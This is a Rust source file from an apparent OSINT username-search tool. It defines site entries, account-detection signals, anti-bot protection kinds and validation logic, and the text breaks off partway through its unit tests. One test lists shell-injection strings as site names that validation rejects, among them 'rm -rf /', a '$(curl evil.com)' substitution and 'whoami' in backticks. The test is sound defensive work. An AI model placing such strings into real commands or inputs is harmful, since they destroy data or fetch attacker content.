Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
31/// One site we can probe for the existence of an account.
32#[derive(Debug, Clone, Serialize, Deserialize)]
33pub struct Site {
34    /// Human-readable site name. Doubles as the stable filter key
35    /// (case-insensitive) used by CLI `--only` / `--exclude`.
36    pub name: String,
37    /// URL template containing a `{username}` placeholder.
38    pub url: UrlTemplate,
39    /// Ordered list of detection signals. Aggregated per the type-level docs.
40    /// Optional in source JSON when [`Site::engine`] is set — the engine's
41    /// signals are inherited at load time. After
42    /// [`crate::Registry`] resolution this vec is always non-empty (or the
43    /// site fails `validate`).
44    #[serde(default, skip_serializing_if = "Vec::is_empty")]
45    pub signals: Vec<Signal>,
46    /// One or more usernames known to exist on this site. Consumed by
47    /// `adler doctor` to verify the signal list still reports `Found`
48    /// for a real account. Accepts either a single string or an array
49    /// of strings in JSON; the doctor probes each in declaration order
50    /// and passes the present-check if **any** one of them resolves to
51    /// `Found`. Listing several is defensive — brand accounts or other
52    /// users that the site special-cases (e.g. Instagram's own
53    /// `instagram` account) shouldn't false-fail the whole site.
54    #[serde(default, skip_serializing_if = "Option::is_none")]
55    pub known_present: Option<KnownPresent>,
56    /// Username known to *not* exist on this site (optional). When omitted,
57    /// the doctor generates a random nonsense username instead.
58    #[serde(default, skip_serializing_if = "Option::is_none")]
59    pub known_absent: Option<String>,
60    /// Optional CSS-selector rules for pulling profile fields (name, bio,
61    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
62    #[serde(default, skip_serializing_if = "Vec::is_empty")]
63    pub extract: Vec<Extractor>,
64    /// Free-form classification tags for scanning a subset of the registry,
65    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
66    /// A site with no tags is universal (included unless a `--tag` filter
67    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
68    /// convention, not enforced.
69    #[serde(default, skip_serializing_if = "Vec::is_empty")]
70    pub tags: Vec<String>,
71    /// Extra HTTP headers to send with the probe (e.g.
72    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
73    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
74    /// backends apply them via `Network.setExtraHTTPHeaders` before
75    /// navigation; the raw-HTTP path doesn't read this yet.
76    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
77    pub request_headers: std::collections::BTreeMap<String, String>,
78    /// Optional regular expression describing usernames a site will
79    /// accept. When set and the scanned username doesn't match, the
80    /// site is skipped (the outcome is reported as `Uncertain` with
81    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
82    /// Saves work AND avoids the false-positive class where a site
83    /// 404s on illegal usernames in ways our signal can't tell apart
84    /// from a missing account.
85    ///
86    /// Imported from Sherlock's `regexCheck` field; 95+ sites
87    /// upstream carry one (length bounds, character classes, etc.).
88    /// Validation at load time compiles the regex with `regex::Regex`
89    /// — a malformed pattern rejects the site rather than silently
90    /// degrading at scan time.
91    #[serde(default, skip_serializing_if = "Option::is_none")]
92    pub regex_check: Option<String>,
93    /// Name of a shared [`Engine`] this site inherits from (e.g.
94    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
95    /// thousands of instances with identical detection signatures;
96    /// defining the signature once on an engine and inheriting it
97    /// keeps the registry small and the cost of a platform-wide
98    /// HTML change one fix instead of hundreds.
99    ///
100    /// At [`crate::Registry::validate`] time, engine fields are
101    /// merged *under* the site's own — anything the site declares
102    /// explicitly (`signals`, `request_headers`, `regex_check`) wins on
103    /// conflict; anything left empty / unset is filled from the
104    /// engine. An `engine: "X"` referring to a non-existent X is a
105    /// load-time error.
106    #[serde(default, skip_serializing_if = "Option::is_none")]
107    pub engine: Option<String>,
108    /// Characters the site silently drops from the username server-side
109    /// before matching — `john.doe` and `johndoe` resolve to the same
110    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
111    /// at probe time so the URL we issue matches the canonical form
112    /// the site uses, avoiding a false `NotFound` on a benign
113    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
114    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
115    #[serde(default, skip_serializing_if = "Option::is_none")]
116    pub strip_bad_char: Option<String>,
117    /// HTTP method used to probe this site. Defaults to GET — the vast
118    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
119    /// some Discord/Holopin endpoints) only answer to POST.
120    #[serde(default, skip_serializing_if = "is_default_method")]
121    pub request_method: HttpMethod,
122    /// Request body to send when [`Site::request_method`] is POST. The
123    /// literal `{username}` placeholder is substituted with the probe
124    /// username (same as URL templates). For GraphQL endpoints this
125    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
126    #[serde(default, skip_serializing_if = "Option::is_none")]
127    pub request_body: Option<String>,
128    /// Specific anti-bot mechanisms the site is known to deploy. A
129    /// richer alternative to the flat `bot-protected` tag — knowing
130    /// *which* protection a site uses lets future routing pick the
131    /// right backend (`Cloudflare` → cloudscraper-style bypass,
132    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
133    /// of the all-or-nothing `bot-protected` decision.
134    ///
135    /// Independent of [`Site::tags`]: the existing `bot-protected`
136    /// tag stays as a back-compat shorthand and routes through the
137    /// browser backend exactly as before. When this vector is
138    /// non-empty Adler also treats the site as bot-protected
139    /// regardless of the tag.
140    #[serde(default, skip_serializing_if = "Vec::is_empty")]
141    pub protection: Vec<ProtectionKind>,
142    /// Disable the site without removing it from the registry.
143    /// Disabled sites are skipped by [`crate::Registry::filter`] —
144    /// they don't get probed, don't appear in `--list-sites`, and
145    /// don't count toward the doctor's tally. Useful for parking
146    /// known-broken entries with a reason comment instead of
147    /// deleting them outright, so a future contributor can re-enable
148    /// the entry by flipping the flag once they've authored a
149    /// working signature.
150    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
151    pub disabled: bool,
152    /// Canonical-source link for mirror-style sites. When a site is
153    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
154    /// `YouTube`), `source` carries the name of the primary site this
155    /// one mirrors. Lets future UX surface "Twitter is offline,
156    /// here's the same account on Nitter" without hand-curated
157    /// linkage. Empty / `None` for canonical sites and sites with
158    /// no known mirror relationship.
159    #[serde(default, skip_serializing_if = "Option::is_none")]
160    pub source: Option<String>,
161    /// Approximate popularity rank — lower numbers are more popular.
162    /// Used by `adler --top N` to scan only the most-popular N sites
163    /// (useful for fast checks of high-signal targets). Ranks are
164    /// curated, not derived from traffic data: the seed set covers
165    /// well-known OSINT-relevant sites where most users have
166    /// accounts. Sites without a rank are skipped by `--top N`.
167    #[serde(default, skip_serializing_if = "Option::is_none")]
168    pub popularity: Option<u32>,
169}
170
171/// A specific anti-bot mechanism a site is known to deploy. Used to
172/// route probes to the right backend (raw HTTP, cloudscraper, full
173/// browser) and to inform users what blocks reliable detection.
174#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
175#[serde(rename_all = "kebab-case")]
176#[non_exhaustive]
177pub enum ProtectionKind {
178    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
179    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
180    /// (e.g. `FlareSolverr`) without a full browser.
181    Cloudflare,
182    /// AWS `CloudFront` edge protection. Often UA-strictness only.
183    Cloudfront,
184    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
185    /// challenge model to Cloudflare.
186    DdosGuard,
187    /// Cloudflare's JS-challenge ("I am under attack" mode).
188    /// Needs a JS-executing backend.
189    CfJsChallenge,
190    /// Cloudflare's WAF firewall blocking by signature, requiring
191    /// a real browser fingerprint to clear.
192    CfFirewall,
193    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
194    /// client by its TLS handshake shape, not its UA).
195    TlsFingerprint,
196    /// `Anubis` proof-of-work challenge. Used by codeberg + a
197    /// growing number of FOSS projects to discourage scraping.
198    Anubis,
199    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
200    /// always blocking — `Uncertain` is the honest answer.
201    Captcha,
202    /// Trivial UA-strictness: rejects unknown User-Agent strings
203    /// but lets through a real-browser UA. Cheapest to bypass.
204    UserAgent,
205    /// Endpoint requires authentication; no anonymous probe path
206    /// exists. Practically unscrapable for OSINT.
207    UserAuth,
208}
209
210/// HTTP method used to probe a site. Only GET and POST are supported.
211#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
212#[serde(rename_all = "UPPERCASE")]
213pub enum HttpMethod {
214    /// Standard GET — the default for ~99% of sites in the registry.
215    #[default]
216    Get,
217    /// POST — for API endpoints that only differentiate accounts via a
218    /// body payload (GraphQL queries, form submissions). Pair with
219    /// [`Site::request_body`].
220    Post,
221}
222
223/// serde's `skip_serializing_if` callback contract requires a
224/// reference, so the by-value lint on a 1-byte type doesn't apply.
225#[allow(clippy::trivially_copy_pass_by_ref)]
226fn is_default_method(m: &HttpMethod) -> bool {
227    matches!(m, HttpMethod::Get)
228}
229
230/// Shared detection signature template for a family of sites that
231/// run the same forum / blog / wiki software (Discourse, vBulletin,
232/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
233///
234/// Engines carry the same kinds of fields as a [`Site`] does (just
235/// the inheritable ones — there's no per-engine `url`, that comes
236/// from the site itself). At registry load, the engine's fields
237/// are merged *under* each referring site's own fields: site wins
238/// on conflict.
239#[derive(Debug, Clone, Default, Serialize, Deserialize)]
240#[non_exhaustive]
241pub struct Engine {
242    /// Default detection signals for sites of this family.
243    /// Inherited only when the site itself declares no `signals`.
244    #[serde(default, skip_serializing_if = "Vec::is_empty")]
245    pub signals: Vec<Signal>,
246    /// Default extra HTTP headers (e.g. a User-Agent that the
247    /// platform accepts where the browser default gets blocked).
248    /// Merged with the site's own headers; site wins per-key.
249    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
250    pub request_headers: std::collections::BTreeMap<String, String>,
251    /// Default username-validity regex inherited only when the site
252    /// itself doesn't declare one.
253    #[serde(default, skip_serializing_if = "Option::is_none")]
254    pub regex_check: Option<String>,
255}
256
257impl Engine {
258    /// Compile-check the engine's own constraints — the inheritable
259    /// fields are subject to the same validation as a site's would
260    /// be.
261    ///
262    /// # Errors
263    /// Returns [`Error::InvalidSite`] when the engine name is
264    /// empty, a signal carries an empty marker, or any other
265    /// constraint a [`Site::validate`] would also flag.
266    pub fn validate(&self, name: &str) -> Result<()> {
267        if name.trim().is_empty() {
268            return Err(Error::InvalidSite {
269                reason: "engine name is empty".into(),
270            });
271        }
272        for signal in &self.signals {
273            signal.validate().map_err(|reason| Error::InvalidSite {
274                reason: format!("engine {name:?}: {reason}"),
275            })?;
276        }
277        if let Some(pat) = &self.regex_check {
278            if let Err(err) = regex::Regex::new(pat) {
279                // The Rust `regex` crate refuses look-around for DoS
280                // reasons; some upstream registries (Sherlock, WMN)
281                // ship patterns that need it. Downgraded from WARN to
282                // DEBUG: it's a known structural limit, the probe
283                // path falls back gracefully, and the noise dominated
284                // CLI startup.
285                tracing::debug!(
286                    engine = %name, pattern = %pat, error = %err,
287                    "engine regex_check did not compile; gate disabled for inheriting sites",
288                );
289            }
290        }
291        Ok(())
292    }
293
294    /// Fill the inheritable empty / unset fields of `site` from
295    /// this engine. Site fields are authoritative: if the site has
296    /// any signals at all, no engine signals are merged in.
297    /// `request_headers` merge per-key (site wins on per-key
298    /// conflict).
299    pub fn merge_into(&self, site: &mut Site) {
300        if site.signals.is_empty() {
301            site.signals.clone_from(&self.signals);
302        }
303        for (k, v) in &self.request_headers {
304            site.request_headers
305                .entry(k.clone())
306                .or_insert_with(|| v.clone());
307        }
308        if site.regex_check.is_none() {
309            site.regex_check.clone_from(&self.regex_check);
310        }
311    }
312}
313
314/// Known-present declaration on a [`Site`].
315///
316/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
317/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
318/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
319/// the site was authored with, so single-username entries stay
320/// compact.
321#[derive(Debug, Clone, Serialize, Deserialize)]
322#[serde(untagged)]
323#[non_exhaustive]
324pub enum KnownPresent {
325    /// Exactly one candidate username.
326    Single(String),
327    /// Two or more candidate usernames. Doctor passes if any resolve
328    /// to `Found`.
329    Multiple(Vec<String>),
330}
331
332impl KnownPresent {
333    /// View all candidate usernames as a slice, in declaration order.
334    /// Always non-empty for `Single`; may be empty for a hand-authored
335    /// `Multiple([])` (validation rejects that).
336    pub fn as_slice(&self) -> &[String] {
337        match self {
338            Self::Single(s) => std::slice::from_ref(s),
339            Self::Multiple(v) => v.as_slice(),
340        }
341    }
342
343    /// Primary candidate — the first declared username. `Single`
344    /// always has one; `Multiple` may be empty if a contributor wrote
345    /// `[]` (caught by [`Site::validate`]).
346    pub fn primary(&self) -> Option<&str> {
347        self.as_slice().first().map(String::as_str)
348    }
349}
350
351impl From<&str> for KnownPresent {
352    fn from(s: &str) -> Self {
353        Self::Single(s.to_owned())
354    }
355}
356
357impl From<String> for KnownPresent {
358    fn from(s: String) -> Self {
359        Self::Single(s)
360    }
361}
362
363/// Upper bound on a site name's length. Names appear in CLI output,
364/// CSV columns, and the validate-sites.yml workflow's run-summary
365/// table — keeping them short avoids both UI breakage and
366/// pathological CI artefacts.
367const NAME_MAX_LEN: usize = 80;
368
369/// True when `name` consists only of characters safe to interpolate
370/// into shell, CSV, and CLI argument contexts. Matches the JSON
371/// Schema pattern `^[\w][\w .()!/+-]*$`.
372fn is_safe_site_name(name: &str) -> bool {
373    let mut chars = name.chars();
374    match chars.next() {
375        Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
376        _ => return false,
377    }
378    chars.all(|c| {
379        c.is_ascii_alphanumeric()
380            || c == '_'
381            || c == ' '
382            || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
383    })
384}
385
386/// A rule for extracting one profile field from a page.
387#[derive(Debug, Clone, Serialize, Deserialize)]
388pub struct Extractor {
389    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
390    pub field: String,
391    /// CSS selector locating the element.
392    pub selector: String,
393    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
394    /// element's trimmed text content is used.
395    #[serde(default, skip_serializing_if = "Option::is_none")]
396    pub attr: Option<String>,
397}
398
399impl Site {
400    /// Render the site URL for a given username.
401    ///
402    /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
403    /// those characters are removed from `username` before
404    /// substitution — so a `john.doe` probe against a site that
405    /// lists `strip_bad_char: "."` actually hits the URL for
406    /// `johndoe`, matching the canonical form the site stores
407    /// internally.
408    pub fn url_for(&self, username: &Username) -> String {
409        let raw = username.as_str();
410        match self.strip_bad_char.as_deref() {
411            Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
412                let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
413                self.url.substitute(&stripped)
414            }
415            _ => self.url.substitute(raw),
416        }
417    }
418
419    /// Validate semantic invariants the type system can't enforce
420    /// (empty signals list, empty markers, empty status code sets).
421    pub fn validate(&self) -> Result<()> {
422        if self.name.trim().is_empty() {
423            return Err(Error::InvalidSite {
424                reason: "site name is empty".into(),
425            });
426        }
427        // Site names doubled as shell-interpolation values in the
428        // `validate-sites.yml` PR gate; an unsanitised name like
429        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
430        // quoting and run arbitrary commands on the runner. Both the
431        // JSON Schema and this Rust loader enforce a safe character
432        // class (word chars plus a few visual punctuation marks) at
433        // every entry point.
434        if self.name.len() > NAME_MAX_LEN {
435            return Err(Error::InvalidSite {
436                reason: format!(
437                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
438                    self.name
439                ),
440            });
441        }
442        if !is_safe_site_name(&self.name) {
443            return Err(Error::InvalidSite {
444                reason: format!(
445                    "site name {:?} contains characters outside the allowed \
446                     set (word chars, space, `.()!/+-`)",
447                    self.name
448                ),
449            });
450        }
451        if self.signals.is_empty() {
452            return Err(Error::InvalidSite {
453                reason: format!("site {:?}: signals list is empty", self.name),
454            });
455        }
456        for signal in &self.signals {
457            signal.validate().map_err(|reason| Error::InvalidSite {
458                reason: format!("site {:?}: {reason}", self.name),
459            })?;
460        }
461        for extractor in &self.extract {
462            if extractor.field.trim().is_empty() {
463                return Err(Error::InvalidSite {
464                    reason: format!("site {:?}: extractor has an empty field name", self.name),
465                });
466            }
467            if scraper::Selector::parse(&extractor.selector).is_err() {
468                return Err(Error::InvalidSite {
469                    reason: format!(
470                        "site {:?}: invalid CSS selector {:?} for field {:?}",
471                        self.name, extractor.selector, extractor.field
472                    ),
473                });
474            }
475        }
476        if let Some(pat) = &self.regex_check {
477            if let Err(err) = regex::Regex::new(pat) {
478                // Sherlock's regexes occasionally use lookarounds
479                // (e.g. `(?![.-])`), which the Rust `regex` crate
480                // doesn't support — it's a true regular-language
481                // engine for performance + DoS safety. Rather than
482                // reject the whole site over a username-gate the
483                // probe path will simply skip and let the site keep
484                // working at the cost of one wasted probe per
485                // illegal username. Logged at DEBUG (not WARN) — it's
486                // a known structural limit, ~8 sites in the embedded
487                // registry need look-around. The noise dominated CLI
488                // startup; set `ADLER_LOG=debug` to see them again.
489                tracing::debug!(
490                    site = %self.name, pattern = %pat, error = %err,
491                    "regex_check did not compile; username-gate disabled for this site",
492                );
493            }
494        }
495        if let Some(kp) = &self.known_present {
496            if kp.as_slice().is_empty() {
497                return Err(Error::InvalidSite {
498                    reason: format!("site {:?}: known_present is an empty list", self.name),
499                });
500            }
501            for name in kp.as_slice() {
502                if name.trim().is_empty() {
503                    return Err(Error::InvalidSite {
504                        reason: format!(
505                            "site {:?}: known_present contains an empty username",
506                            self.name
507                        ),
508                    });
509                }
510            }
511        }
512        for tag in &self.tags {
513            if tag.trim().is_empty() {
514                return Err(Error::InvalidSite {
515                    reason: format!("site {:?}: tag is empty", self.name),
516                });
517            }
518        }
519        Ok(())
520    }
521}
522
523/// URL template containing a `{username}` placeholder.
524///
525/// Validated at construction: must contain the placeholder and start with
526/// `http://` or `https://`.
527#[derive(Debug, Clone, PartialEq, Eq)]
528pub struct UrlTemplate(String);
529
530const PLACEHOLDER: &str = "{username}";
531
532impl UrlTemplate {
533    /// Build a template, validating placeholder and scheme.
534    pub fn new(template: impl Into<String>) -> Result<Self> {
535        let t = template.into();
536        if !t.contains(PLACEHOLDER) {
537            return Err(Error::InvalidSite {
538                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
539            });
540        }
541        if !(t.starts_with("http://") || t.starts_with("https://")) {
542            return Err(Error::InvalidSite {
543                reason: format!("url template must start with http(s)://: {t:?}"),
544            });
545        }
546        Ok(Self(t))
547    }
548
549    fn substitute(&self, username: &str) -> String {
550        self.0.replace(PLACEHOLDER, username)
551    }
552
553    /// Borrow the raw template (with placeholder).
554    pub fn as_str(&self) -> &str {
555        &self.0
556    }
557}
558
559impl fmt::Display for UrlTemplate {
560    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
561        f.write_str(&self.0)
562    }
563}
564
565impl Serialize for UrlTemplate {
566    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
567        self.0.serialize(s)
568    }
569}
570
571impl<'de> Deserialize<'de> for UrlTemplate {
572    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
573        let raw = String::deserialize(d)?;
574        Self::new(raw).map_err(serde::de::Error::custom)
575    }
576}
577
578/// A single piece of evidence about whether an account exists.
579///
580/// Signals are tagged in JSON by their `kind`. New variants will land for
581/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
582/// adding variants is not a breaking change.
583#[derive(Debug, Clone, Serialize, Deserialize)]
584#[serde(tag = "kind", rename_all = "snake_case")]
585#[non_exhaustive]
586pub enum Signal {
587    /// Votes **`Found`** when the response status is in `codes`.
588    StatusFound {
589        /// Status codes that vote for existence. Must be non-empty.
590        codes: Vec<u16>,
591    },
592    /// Votes **`NotFound`** when the response status is in `codes`.
593    StatusNotFound {
594        /// Status codes that vote for non-existence. Must be non-empty.
595        codes: Vec<u16>,
596    },
597    /// Votes **`Found`** when the response body contains `text`.
598    BodyPresent {
599        /// Substring whose appearance votes for existence. Must be non-empty.
600        text: String,
601    },
602    /// Votes **`NotFound`** when the response body contains `text`.
603    BodyAbsent {
604        /// Substring whose appearance votes for non-existence (e.g.
605        /// `"Profile not found"`). Must be non-empty.
606        text: String,
607    },
608    /// Votes **`NotFound`** when the final URL (post-redirect) contains
609    /// `fragment`.
610    RedirectAbsent {
611        /// Substring that, when present in the final URL, indicates the
612        /// account is missing (typically `"/login"` or `"/404"`). Must be
613        /// non-empty.
614        fragment: String,
615    },
616}
617
618/// Probe data extracted from an HTTP response, fed to each [`Signal`].
619///
620/// Internal detection plumbing — not part of the public API.
621#[derive(Debug)]
622pub(crate) struct Probe<'a> {
623    /// HTTP status code.
624    pub(crate) status: u16,
625    /// Final URL after redirects.
626    pub(crate) final_url: &'a str,
627    /// Decoded response body. Empty string when no body-using signal is configured.
628    pub(crate) body: &'a str,
629}
630
631/// What one signal concluded after looking at a probe.
632#[derive(Debug, Clone, Copy, PartialEq, Eq)]
633pub(crate) enum SignalVerdict {
634    /// This signal votes that the account exists.
635    Found,
636    /// This signal votes that the account does not exist.
637    NotFound,
638    /// This signal had nothing to say (its trigger condition didn't match).
639    Ambiguous,
640}
641
642impl Signal {
643    /// True if this signal needs to inspect the response body. Used by the
644    /// client to skip body reads when no signal requires them.
645    pub(crate) fn needs_body(&self) -> bool {
646        matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
647    }
648
649    /// Evaluate this signal against a probe and produce a vote.
650    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
651        match self {
652            Self::StatusFound { codes } => {
653                if codes.contains(&probe.status) {
654                    SignalVerdict::Found
655                } else {
656                    SignalVerdict::Ambiguous
657                }
658            }
659            Self::StatusNotFound { codes } => {
660                if codes.contains(&probe.status) {
661                    SignalVerdict::NotFound
662                } else {
663                    SignalVerdict::Ambiguous
664                }
665            }
666            Self::BodyPresent { text } => {
667                if probe.body.contains(text.as_str()) {
668                    SignalVerdict::Found
669                } else {
670                    SignalVerdict::Ambiguous
671                }
672            }
673            Self::BodyAbsent { text } => {
674                if probe.body.contains(text.as_str()) {
675                    SignalVerdict::NotFound
676                } else {
677                    SignalVerdict::Ambiguous
678                }
679            }
680            Self::RedirectAbsent { fragment } => {
681                if probe.final_url.contains(fragment.as_str()) {
682                    SignalVerdict::NotFound
683                } else {
684                    SignalVerdict::Ambiguous
685                }
686            }
687        }
688    }
689
690    /// Human-readable description of why this signal fired against `probe`,
691    /// for verdict explainability. Only meaningful for a signal that voted
692    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
693    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
694        match self {
695            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
696            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
697            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
698            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
699            Self::RedirectAbsent { fragment } => {
700                format!("final URL contains {fragment:?} (redirect_absent)")
701            }
702        }
703    }
704
705    fn validate(&self) -> std::result::Result<(), String> {
706        match self {
707            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
708                if codes.is_empty() {
709                    return Err("status signal codes list is empty".into());
710                }
711            }
712            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
713                if text.is_empty() {
714                    return Err("body signal text is empty".into());
715                }
716            }
717            Self::RedirectAbsent { fragment } => {
718                if fragment.is_empty() {
719                    return Err("redirect signal fragment is empty".into());
720                }
721            }
722        }
723        Ok(())
724    }
725}
726
727/// Aggregate per-signal verdicts into a final [`MatchKind`].
728///
729/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
730/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
731/// docs for why a `NotFound` vote outranks a `Found` vote.
732pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
733where
734    I: IntoIterator<Item = SignalVerdict>,
735{
736    let mut found = false;
737    let mut not_found = false;
738    for v in verdicts {
739        match v {
740            SignalVerdict::Found => found = true,
741            SignalVerdict::NotFound => not_found = true,
742            SignalVerdict::Ambiguous => {}
743        }
744    }
745    if not_found {
746        MatchKind::NotFound
747    } else if found {
748        MatchKind::Found
749    } else {
750        MatchKind::Uncertain
751    }
752}
753
754#[cfg(test)]
755mod tests {
756    use super::*;
757
758    fn site_with(signals: Vec<Signal>) -> Site {
759        Site {
760            name: "Example".into(),
761            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
762            signals,
763            known_present: None,
764            known_absent: None,
765            extract: Vec::new(),
766            tags: Vec::new(),
767            request_headers: std::collections::BTreeMap::new(),
768            regex_check: None,
769            engine: None,
770            strip_bad_char: None,
771            request_method: crate::site::HttpMethod::Get,
772            request_body: None,
773            protection: Vec::new(),
774            disabled: false,
775            source: None,
776            popularity: None,
777        }
778    }
779
780    #[test]
781    fn url_template_substitutes_placeholder() {
782        let user = Username::new("alice").unwrap();
783        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
784        assert_eq!(site.url_for(&user), "https://example.com/alice");
785    }
786
787    #[test]
788    fn url_for_strips_bad_chars_before_substitution() {
789        let user = Username::new("john.doe").unwrap();
790        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
791        site.strip_bad_char = Some(".".into());
792        assert_eq!(site.url_for(&user), "https://example.com/johndoe");
793    }
794
795    #[test]
796    fn url_for_strip_bad_char_noop_when_no_match() {
797        let user = Username::new("alice").unwrap();
798        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
799        site.strip_bad_char = Some(".".into());
800        assert_eq!(site.url_for(&user), "https://example.com/alice");
801    }
802
803    #[test]
804    fn url_template_rejects_missing_placeholder() {
805        assert!(UrlTemplate::new("https://example.com/users/").is_err());
806    }
807
808    #[test]
809    fn url_template_rejects_bad_scheme() {
810        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
811    }
812
813    #[test]
814    fn validate_requires_non_empty_signals() {
815        let err = site_with(vec![]).validate().unwrap_err();
816        assert!(err.to_string().contains("signals list is empty"));
817    }
818
819    #[test]
820    fn validate_rejects_empty_status_codes() {
821        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
822            .validate()
823            .unwrap_err();
824        assert!(err.to_string().contains("status signal"));
825    }
826
827    #[test]
828    fn validate_rejects_empty_body_text() {
829        let err = site_with(vec![Signal::BodyAbsent {
830            text: String::new(),
831        }])
832        .validate()
833        .unwrap_err();
834        assert!(err.to_string().contains("body signal"));
835    }
836
837    #[test]
838    fn validate_rejects_empty_redirect_fragment() {
839        let err = site_with(vec![Signal::RedirectAbsent {
840            fragment: String::new(),
841        }])
842        .validate()
843        .unwrap_err();
844        assert!(err.to_string().contains("redirect signal"));
845    }
846
847    #[test]
848    fn validate_rejects_shell_metacharacters_in_name() {
849        // The validate-sites.yml workflow used to inject `--only "$name"`
850        // where `$name` came from PR-controlled sites.json. A name like
851        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
852        // and executed on the runner. Schema + this loader both enforce
853        // a safe character class; verify a representative selection of
854        // dangerous chars is rejected.
855        for bad in [
856            "Foo\"; rm -rf /; #",
857            "Bar$(curl evil.com)",
858            "Baz`whoami`",
859            "Qux\\nfoo",
860            "back\\slash",
861            "pipe|ish",
862            "semi;colon",
863            "amp&and",
864            "lt<gt>",
865        ] {
866            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
867            s.name = bad.into();
868            let err = s.validate().unwrap_err();
869            assert!(
870                err.to_string()
871                    .contains("characters outside the allowed set"),
872                "expected unsafe-name rejection for {bad:?}, got {err}",
873            );
874        }
875    }
876
877    #[test]
878    fn validate_accepts_real_world_site_names() {
879        // Cross-check the validation against names we actually ship.
880        for ok in [
881            "GitHub",
882            "Steam Community (User)",
883            "X / Twitter",
884            "osu!",
885            "Eintracht Frankfurt Forum",
886            "Archive of Our Own",
887            "Career.habr",
888            "fl",
889            "GitLab.com",
890            "Sbazar.cz",
891        ] {
892            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
893            s.name = ok.into();
894            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
895        }
896    }
897
898    #[test]
899    fn validate_rejects_overlong_name() {
900        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
901        s.name = "A".repeat(100);
902        let err = s.validate().unwrap_err();
903        assert!(err.to_string().contains("longer than"));
904    }
905
906    #[test]
907    fn validate_accepts_well_formed_regex_check() {
